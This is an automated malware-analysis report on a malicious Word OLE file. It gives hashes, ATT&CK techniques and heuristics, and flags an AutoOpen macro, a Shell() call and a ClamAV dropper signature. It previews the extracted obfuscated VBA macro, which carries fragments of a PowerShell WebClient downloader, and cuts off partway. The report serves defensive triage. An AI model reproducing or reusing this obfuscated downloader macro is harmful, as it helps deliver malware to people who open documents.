Office (OLE) malware analysis — malicious · e9a25ccb7e3d4e6a

MALICIOUS

Office (OLE)

190.4 KB Created: 2017-12-07 16:40:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 4fbb8cea68d03e05938180c091c2d8ce SHA-1: b62ce7166813b973dbb00dfded9686d112cd54a0 SHA-256: e9a25ccb7e3d4e6a36bc988c6ac7fd1eefb9626482ba5cb8b183359ada735424

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OLE file containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious intent, likely to download and execute a secondary payload. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports its classification as a dropper or phishing lure.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://QnW+bNl+biQpwHDj4zF4X� In document text (OLE body)
- http://QnW+bNl+biQpwHDj4zF4XIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 76880 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	76880 bytes
SHA-256: `00b3457c233c576639a69c435c8bc2783c8b3a34ad22ae471b4be45f626a8927`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "GCobfBoa" Function ERpwmCJmS() JOtHq = Array(UCase("SfYYZujZDzic" + "QRPzDjruV" + "IHKEuOzzh" + "ZHSTDiAIHQDj" + "cbGKVpDT"), UCase("wQQROpoKFAArq" + "zwvUiinF" + "czidoDcH" + "RhKBDmTKTwK" + "fQlRHOZ")) EhCRRrE = Mid("jl8hWRwU3rw7VACCwpvZaMz0kRwjfn07W+QnW/QnW+QnWZQbNl+bNlnbNl+bNlW'+'+QnW9'+'v.QnW+QnWSplQnW+QnWit(QnW+QnWZQnW+QnW9v,ZQnW+QnW9v)QnW+QnW;PQnW+QnWxbNl'+'+bN'+'lRkarapaQnW+QnWs = PxQnbNl+bNlW+QbNl+bNlnWRnsQnW+QnWadQnW+QnWasd.Vv", 33, 187) daTYUmuaMn = Array(UCase("AYQwhZk" + "DiQAULhlioPD" + "LsUuQiViGn" + "XdIUPtl" + "ajvlsklvuppRJ"), UCase("hpjwDRuOHw" + "PcqDNWoCYcpQGb" + "ijbpQWrD" + "ToSqUwMZwrcHus" + "TBOksrYZUsnK")) lmivzrKAPA = Array(UCase("UkEqFoSfMA" + "dsXZIwzt" + "BYPqvHwi" + "LjpCmIjdUwOUnz" + "phKHqdTKV"), UCase("TwVOuwrji" + "TRaFOsf" + "AioNavAOwps" + "rWUlTMLPZw" + "lEvzYGEtzz")) pzBiUE = Array(UCase("iUSaBAQiwkijjA" + "DqdbwHLnz" + "RULUPZuEfaJWq" + "sSnDXik" + "Pivnpfo"), UCase("ShVjjfFJhKnf" + "ZJjzXii" + "IPOGNFjZcj" + "PsIcAHWNM" + "VNuFzpVOnSz")) wENfMA = Mid("TSERBkO+'+'QnWZQbNl+bNlnW+QnWZ9vQnW+QnW PjFiivJ8Q", 8, 33) UCAmls = Array(UCase("JrcFVZNjBCrOK" + "zomChQECGCIfwc" + "rwuWCNdI" + "qlBtzVuql" + "bRSqQhl"), UCase("kZwqdkZJ" + "wsHjTjY" + "vOLFkISt" + "BpZFipRGsjRAI" + "UnPzwiTHl")) YLJCBfon = Array(UCase("SKRHcVZY" + "FaZQLRjjrBVR" + "mCTBOPLLoRRFa" + "KsfAnntQmVpnYo" + "vQbsbYPobHKN"), UCase("QIHLlUWnMB" + "izVPzLarWdtB" + "MwZuEDsdZTziO" + "BESuiPtNiCA" + "PhSrvXHRwnubi")) IEHJUX = Array(UCase("bufMKURsB" + "jVQBXFioZGi" + "VmMRWtFJj" + "RdMBGoJLfIZLw" + "uIcaWWqllI"), UCase("tzszXmszrD" + "pWzpfNaVtKps" + "OQinKwfsEc" + "pQNIVhNE" + "ITFajqcLP")) hhMfVns = Mid("33b1lvdipFjN9Sa62uuwsXkQnW+QbNl+bNlnWe-'+'I'+'QnW+QnWtem(PQnW+Qn'+'WxRhuasQnW+QnW);QnW+QnWbreQnW+QnUWbs4", 23, 77) UnztHh = Array(UCase("IFEdWljh" + "nDiKmzwTXu" + "nLKiYcWwj" + "JrLZGnJAf" + "GiIfnMNUU"), UCase("TXjTVwuVFuOnBL" + "MWkfJpTrfIF" + "fuLOCcj" + "lKsEKtnvlATjzB" + "pcpKJAjALPs")) ddTijMo = Array(UCase("ODGVjGIEn" + "XtlunAPzSAMwl" + "OvLDHTVUdpN" + "iviBNcaK" + "OhLnfbcsPBSSf"), UCase("ovEwTXCP" + "jiRUVRmjWahzNz" + "csscOovqD" + "qFJjGnqwmiJNG" + "acRwrzGa")) YXwsDjXLIrD = Array(UCase("qdimccTsJVASUk" + "OjVCWCYhwZvkV" + "UaNmqPNjFE" + "mohHLuXmF" + "vfzauSwk"), UCase("hswWoumjd" + "diiRlkNrZn" + "XwPLYuNLvwR" + "sWYoRsNYNtQbcR" + "OqhbWwhKu")) JuIoMb = Mid("760SiCBZ9J -rEPlAcE bNlkA8bNl,[cHAR]92 -rEPlAcE([cHAR]75+[cHAR]101+[cHAR]109),[cHAR]124)Dfv.( YCUEnv:PubliC[13]+YCUeNv:pUbL'+'iC[5]+bN'+'lXbNl)').replACE('bNl'kwA86rOjt7GVrwawzt", 11, 150) wlbcIHlCdz = Array(UCase("oUaiaBHlnOffLd" + "PnrBbVG" + "llBlWzzFh" + "JVMjIQzis" + "zbbPzOjEGF"), UCase("ahFosYPkmoIzQC" + "rjiaDwdk" + "KKmmHSvzc" + "jnGrPrhtG" + "qdLMrXzZfBCz")) qwlbB = Array(UCase("LQAYUiZMlmuN" + "vwMORdhnjGfzVO" + "vzKMiFGcMA" + "LrPqfUBulcJiQh" + "vbJUZwUD"), UCase("lbhiqoWzO" + "RpXsbLwbcs" + "RtfRJiSsaurn" + "FDnSDzGJUtPXXj" + "JbXrLiTiCQjK")) LjBhuYiV = Array(UCase("mOpwZUBwYZJc" + "DPAlYSNsJpkhS" + "mEIcdZMI" + "ITZzoihYDUSMjZ" + "KTJrdZEQGNOrPw"), UCase("DduUsRwSYNb" + "hNzuGfJSJ" + "UfVDCTman" + "bXRpRMhhL" + "kiBIXDH")) fCmcEKj = Mid("GVwz5DbNl+bNlQnWt QnW+QnWSysQnW+QnWtem.Net.WebClient;QnW+QnWPxRQnW+QnWnsabNl+bNldQnW+QbNl+'+'bNlnWaQnW+QnWsQnW+QnW'+'d QnW+QnW= QnW+QnWn5uR5qv5MMjUD6vBi", 7, 130) rRjCV = Array(UCase("HncZBYn" + "XfXflczAPu" + "vjjzXzcUlVkB" + "mCCjQpVzwL" + "vzMZBWimWvPU"), UCase("nFZZDBBndA" + "jaQkZZmwYwDXn" + "TPnzfbX" + "isKQwwvJzSzU" + "bFzMzIQvZkimW")) mFQiaXXm = Array(UCase("ILGiVmJPw" + "PfjzZJpKvKcuw" + "GIfpdNfwMTS" + "LwBffCNsRjU" + "EsTNIwqNNdXNG"), UCase("llIQTMfzzs" + "QfajFKao" + "lltSqPdEOhYoY" + "QbjBMHHG" + "bErRQhHTzYOiAr")) ClBwn = Array(UCase("LfBHaPft" + "hsunKZOoGiEuRY" + "kUjjRzPtWzzwcb" + "jVWBuLWVwYlrvk" + "PtGBXGfwbzRz"), UCase("qNalNGwiYP" + "nOwkIjHUIlh" + "raDtAWu" + "cMw ... (truncated)

SHA-256: 00b3457c233c576639a69c435c8bc2783c8b3a34ad22ae471b4be45f626a8927

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GCobfBoa"
Function ERpwmCJmS()
JOtHq = Array(UCase("SfYYZujZDzic" + "QRPzDjruV" + "IHKEuOzzh" + "ZHSTDiAIHQDj" + "cbGKVpDT"), UCase("wQQROpoKFAArq" + "zwvUiinF" + "czidoDcH" + "RhKBDmTKTwK" + "fQlRHOZ"))
EhCRRrE = Mid("jl8hWRwU3rw7VACCwpvZaMz0kRwjfn07W+QnW/QnW+QnWZQbNl+bNlnbNl+bNlW'+'+QnW9'+'v.QnW+QnWSplQnW+QnWit(QnW+QnWZQnW+QnW9v,ZQnW+QnW9v)QnW+QnW;PQnW+QnWxbNl'+'+bN'+'lRkarapaQnW+QnWs = PxQnbNl+bNlW+QbNl+bNlnWRnsQnW+QnWadQnW+QnWasd.Vv", 33, 187)
daTYUmuaMn = Array(UCase("AYQwhZk" + "DiQAULhlioPD" + "LsUuQiViGn" + "XdIUPtl" + "ajvlsklvuppRJ"), UCase("hpjwDRuOHw" + "PcqDNWoCYcpQGb" + "ijbpQWrD" + "ToSqUwMZwrcHus" + "TBOksrYZUsnK"))
lmivzrKAPA = Array(UCase("UkEqFoSfMA" + "dsXZIwzt" + "BYPqvHwi" + "LjpCmIjdUwOUnz" + "phKHqdTKV"), UCase("TwVOuwrji" + "TRaFOsf" + "AioNavAOwps" + "rWUlTMLPZw" + "lEvzYGEtzz"))
pzBiUE = Array(UCase("iUSaBAQiwkijjA" + "DqdbwHLnz" + "RULUPZuEfaJWq" + "sSnDXik" + "Pivnpfo"), UCase("ShVjjfFJhKnf" + "ZJjzXii" + "IPOGNFjZcj" + "PsIcAHWNM" + "VNuFzpVOnSz"))
wENfMA = Mid("TSERBkO+'+'QnWZQbNl+bNlnW+QnWZ9vQnW+QnW PjFiivJ8Q", 8, 33)
UCAmls = Array(UCase("JrcFVZNjBCrOK" + "zomChQECGCIfwc" + "rwuWCNdI" + "qlBtzVuql" + "bRSqQhl"), UCase("kZwqdkZJ" + "wsHjTjY" + "vOLFkISt" + "BpZFipRGsjRAI" + "UnPzwiTHl"))
YLJCBfon = Array(UCase("SKRHcVZY" + "FaZQLRjjrBVR" + "mCTBOPLLoRRFa" + "KsfAnntQmVpnYo" + "vQbsbYPobHKN"), UCase("QIHLlUWnMB" + "izVPzLarWdtB" + "MwZuEDsdZTziO" + "BESuiPtNiCA" + "PhSrvXHRwnubi"))
IEHJUX = Array(UCase("bufMKURsB" + "jVQBXFioZGi" + "VmMRWtFJj" + "RdMBGoJLfIZLw" + "uIcaWWqllI"), UCase("tzszXmszrD" + "pWzpfNaVtKps" + "OQinKwfsEc" + "pQNIVhNE" + "ITFajqcLP"))
hhMfVns = Mid("33b1lvdipFjN9Sa62uuwsXkQnW+QbNl+bNlnWe-'+'I'+'QnW+QnWtem(PQnW+Qn'+'WxRhuasQnW+QnW);QnW+QnWbreQnW+QnUWbs4", 23, 77)
UnztHh = Array(UCase("IFEdWljh" + "nDiKmzwTXu" + "nLKiYcWwj" + "JrLZGnJAf" + "GiIfnMNUU"), UCase("TXjTVwuVFuOnBL" + "MWkfJpTrfIF" + "fuLOCcj" + "lKsEKtnvlATjzB" + "pcpKJAjALPs"))
ddTijMo = Array(UCase("ODGVjGIEn" + "XtlunAPzSAMwl" + "OvLDHTVUdpN" + "iviBNcaK" + "OhLnfbcsPBSSf"), UCase("ovEwTXCP" + "jiRUVRmjWahzNz" + "csscOovqD" + "qFJjGnqwmiJNG" + "acRwrzGa"))
YXwsDjXLIrD = Array(UCase("qdimccTsJVASUk" + "OjVCWCYhwZvkV" + "UaNmqPNjFE" + "mohHLuXmF" + "vfzauSwk"), UCase("hswWoumjd" + "diiRlkNrZn" + "XwPLYuNLvwR" + "sWYoRsNYNtQbcR" + "OqhbWwhKu"))
JuIoMb = Mid("760SiCBZ9J -rEPlAcE bNlkA8bNl,[cHAR]92  -rEPlAcE([cHAR]75+[cHAR]101+[cHAR]109),[cHAR]124)Dfv.( YCUEnv:PubliC[13]+YCUeNv:pUbL'+'iC[5]+bN'+'lXbNl)').replACE('bNl'kwA86rOjt7GVrwawzt", 11, 150)
wlbcIHlCdz = Array(UCase("oUaiaBHlnOffLd" + "PnrBbVG" + "llBlWzzFh" + "JVMjIQzis" + "zbbPzOjEGF"), UCase("ahFosYPkmoIzQC" + "rjiaDwdk" + "KKmmHSvzc" + "jnGrPrhtG" + "qdLMrXzZfBCz"))
qwlbB = Array(UCase("LQAYUiZMlmuN" + "vwMORdhnjGfzVO" + "vzKMiFGcMA" + "LrPqfUBulcJiQh" + "vbJUZwUD"), UCase("lbhiqoWzO" + "RpXsbLwbcs" + "RtfRJiSsaurn" + "FDnSDzGJUtPXXj" + "JbXrLiTiCQjK"))
LjBhuYiV = Array(UCase("mOpwZUBwYZJc" + "DPAlYSNsJpkhS" + "mEIcdZMI" + "ITZzoihYDUSMjZ" + "KTJrdZEQGNOrPw"), UCase("DduUsRwSYNb" + "hNzuGfJSJ" + "UfVDCTman" + "bXRpRMhhL" + "kiBIXDH"))
fCmcEKj = Mid("GVwz5DbNl+bNlQnWt QnW+QnWSysQnW+QnWtem.Net.WebClient;QnW+QnWPxRQnW+QnWnsabNl+bNldQnW+QbNl+'+'bNlnWaQnW+QnWsQnW+QnW'+'d QnW+QnW= QnW+QnWn5uR5qv5MMjUD6vBi", 7, 130)
rRjCV = Array(UCase("HncZBYn" + "XfXflczAPu" + "vjjzXzcUlVkB" + "mCCjQpVzwL" + "vzMZBWimWvPU"), UCase("nFZZDBBndA" + "jaQkZZmwYwDXn" + "TPnzfbX" + "isKQwwvJzSzU" + "bFzMzIQvZkimW"))
mFQiaXXm = Array(UCase("ILGiVmJPw" + "PfjzZJpKvKcuw" + "GIfpdNfwMTS" + "LwBffCNsRjU" + "EsTNIwqNNdXNG"), UCase("llIQTMfzzs" + "QfajFKao" + "lltSqPdEOhYoY" + "QbjBMHHG" + "bErRQhHTzYOiAr"))
ClBwn = Array(UCase("LfBHaPft" + "hsunKZOoGiEuRY" + "kUjjRzPtWzzwcb" + "jVWBuLWVwYlrvk" + "PtGBXGfwbzRz"), UCase("qNalNGwiYP" + "nOwkIjHUIlh" + "raDtAWu" + "cMw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.